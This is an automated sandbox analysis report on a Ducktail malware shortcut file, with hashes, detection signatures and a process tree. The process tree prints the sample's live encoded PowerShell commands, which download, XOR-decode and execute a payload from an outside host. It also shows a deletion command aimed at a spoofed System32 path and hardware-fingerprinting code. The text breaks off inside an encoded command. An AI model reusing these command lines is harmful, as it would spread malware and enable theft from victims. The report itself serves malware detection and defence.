Edit tour

Windows Analysis Report
0A3NB8ot11.lnk

Overview

General Information

Sample name:	0A3NB8ot11.lnk
Analysis ID:	1573016
MD5:	e0e574ffa723e6fa127f24845bd649da
SHA1:	9aae7e9f61a1efda843964a651047855bbfae0ce
SHA256:	2c0d998d2a843533d1627ad62d413a01d3b4d0b86ca2527b1f56a5e42f059409
Infos:

Detection

Ducktail

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Windows shortcut file (LNK) starts blacklisted processes

Yara detected Ducktail

Allows multiple concurrent remote connection

Bypasses PowerShell execution policy

Encrypted powershell cmdline option found

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Modifies security policies related information

Potential dropper URLs found in powershell memory

PowerShell case anomaly found

Powershell drops PE file

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Reads the Security eventlog

Reads the System eventlog

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: PowerShell Base64 Encoded IEX Cmdlet

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Sigma detected: PowerShell Base64 Encoded WMI Classes

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious New Service Creation

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious PowerShell Invocations - Specific - PowerShell Module

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Uses known network protocols on non-standard ports

Uses regedit.exe to modify the Windows registry

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates or modifies windows services

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

PE file contains strange resources

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64native

cmd.exe (PID: 8116 cmdline: "C:\Windows\system32\cmd.exe" /v /k "pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAFEAQQBGAE0AQQBNAEEAQQAxAEEARwAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARwA0AEEAVgBBAEIARgBBAEcANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="" && exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 7116 cmdline: pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAFEAQQBGAE0AQQBNAEEAQQAxAEEARwAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARwA0AEEAVgBBAEIARgBBAEcANABBAGQAQQBBAHAAQQBDAGsAQQAiAA==" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 1804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAFQAUwB0AFIASQBOAGcAKAAoAEkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBQAFMAMAA1AG0AIgApACkAKQApAC4AQwBPAG4AVABFAG4AdAApACkA MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

csc.exe (PID: 8376 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 8400 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD097.tmp" "c:\Users\user\AppData\Local\Temp\40v0i4f3\CSCD6446BB959A24110B54C9D2694B6A8A7.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

powershell.exe (PID: 8600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

WINWORD.EXE (PID: 8832 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\JD-Meta-Ads-Manager.pdf.docx" /o "" MD5: E7F3B8EA1B06F46176FC5C35307727D6)

cmd.exe (PID: 8892 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA0ADQAMgBkADYAZAAyAGIAYgBiAGYAOQA1AGEAMABjADIAZAA5ADgAMwAzADUAYwA3AGMAZgAxADIAZAA5AGQANABhADIAMQA2ADMAYgBmAGQAMwAzAGYANAAyADUANAA3AGQAOABlADIAMQA3ADYAMwA0ADkAZgBjADUAYgBlAGMAOQA5ADkAZABmADcANwBlAGQANgBmAGMAMQAwAGMAZAAyAGIAOABmADEAYgBmADYAZQAxADQAMQA5AGEAZgBkADEAYgA4AGUANgA1ADIAZAA2ADAAOAAyADAAYQA1ADYAZgA1AGQAOAA3ADIAYgA5ADgAMwAyAGQANQA4AGMAZgBlADYANQAzADQAOABiAGQAYgA2ADEANgBkAGIAMgAzAGUANAAzAGYANwA5ADcAMgBkAGEAZgAzADkAMQBmADEAMwBiAGQANgBhADYAOQBjADgAOQAxADkAMAAyADgAMAA3AGEAYQBkADQAMgAzADYAMgA3ADgAMQAxAGMAOABlADAAZAA0AGEAYQA3AGUAZQA5ADMAOQBkADcANAA1ADIAMAAxAGUAZQBkADgAMAA2AGUAZQA5ADcAOQBmAGEAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABiAHkAdABlAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJABiAHkAdABlAEEAcgByAGEAeQBbACQAaQBdACAAPQAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEAOwAgAH0ADQAKAAkACQBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBBAHIAcgBhAHkAKQApADsADQAKAAkACQBiAHIAZQBhAGsAOwANAAoACQB9AA0ACgAJAGMAYQB0AGMAaAANAAoACQB7AA0ACgAJAAkAUwBlAG4AZAAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQA7AA0ACgAJAAkAJABjAG8AdQBuAHQAIAAtAD0AIAAxADsADQAKAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADUAOwANAAoACQB9AA0ACgB9AA0ACgANAAoADQAKAA== MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 8952 cmdline: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA0ADQAMgBkADYAZAAyAGIAYgBiAGYAOQA1AGEAMABjADIAZAA5ADgAMwAzADUAYwA3AGMAZgAxADIAZAA5AGQANABhADIAMQA2ADMAYgBmAGQAMwAzAGYANAAyADUANAA3AGQAOABlADIAMQA3ADYAMwA0ADkAZgBjADUAYgBlAGMAOQA5ADkAZABmADcANwBlAGQANgBmAGMAMQAwAGMAZAAyAGIAOABmADEAYgBmADYAZQAxADQAMQA5AGEAZgBkADEAYgA4AGUANgA1ADIAZAA2ADAAOAAyADAAYQA1ADYAZgA1AGQAOAA3ADIAYgA5ADgAMwAyAGQANQA4AGMAZgBlADYANQAzADQAOABiAGQAYgA2ADEANgBkAGIAMgAzAGUANAAzAGYANwA5ADcAMgBkAGEAZgAzADkAMQBmADEAMwBiAGQANgBhADYAOQBjADgAOQAxADkAMAAyADgAMAA3AGEAYQBkADQAMgAzADYAMgA3ADgAMQAxAGMAOABlADAAZAA0AGEAYQA3AGUAZQA5ADMAOQBkADcANAA1ADIAMAAxAGUAZQBkADgAMAA2AGUAZQA5ADcAOQBmAGEAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABiAHkAdABlAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJABiAHkAdABlAEEAcgByAGEAeQBbACQAaQBdACAAPQAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEAOwAgAH0ADQAKAAkACQBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBBAHIAcgBhAHkAKQApADsADQAKAAkACQBiAHIAZQBhAGsAOwANAAoACQB9AA0ACgAJAGMAYQB0AGMAaAANAAoACQB7AA0ACgAJAAkAUwBlAG4AZAAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQA7AA0ACgAJAAkAJABjAG8AdQBuAHQAIAAtAD0AIAAxADsADQAKAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADUAOwANAAoACQB9AA0ACgB9AA0ACgANAAoADQAKAA== MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sppsvc.exe (PID: 3372 cmdline: C:\Windows\system32\sppsvc.exe MD5: 30C7EF47B57367CC546173BB4BB2BB04)

svczHost.exe (PID: 6444 cmdline: C:\Windows\Temp\svczHost.exe cakoi10 cocomethode.de MD5: 9298A0077E8353244A38CAEFE43AF4CB)

conhost.exe (PID: 6384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 8400 cmdline: "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 6700 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 8688 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

powershell.exe (PID: 9136 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzA